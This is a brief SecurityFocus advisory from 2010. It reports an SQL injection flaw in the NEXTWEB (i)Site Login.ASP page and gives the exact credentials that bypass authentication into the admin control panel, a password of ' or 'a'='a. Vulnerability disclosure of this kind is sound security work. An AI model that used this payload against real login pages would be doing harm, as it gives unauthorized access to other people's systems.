NEXTWEB (i)Site Login.ASP SQL Injection Vulnerability

No exploit is required.

Supplying the following is sufficient to gain access to the admin control panel:
username: admin
password: ' or 'a'='a


 

Privacy Statement
Copyright 2010, SecurityFocus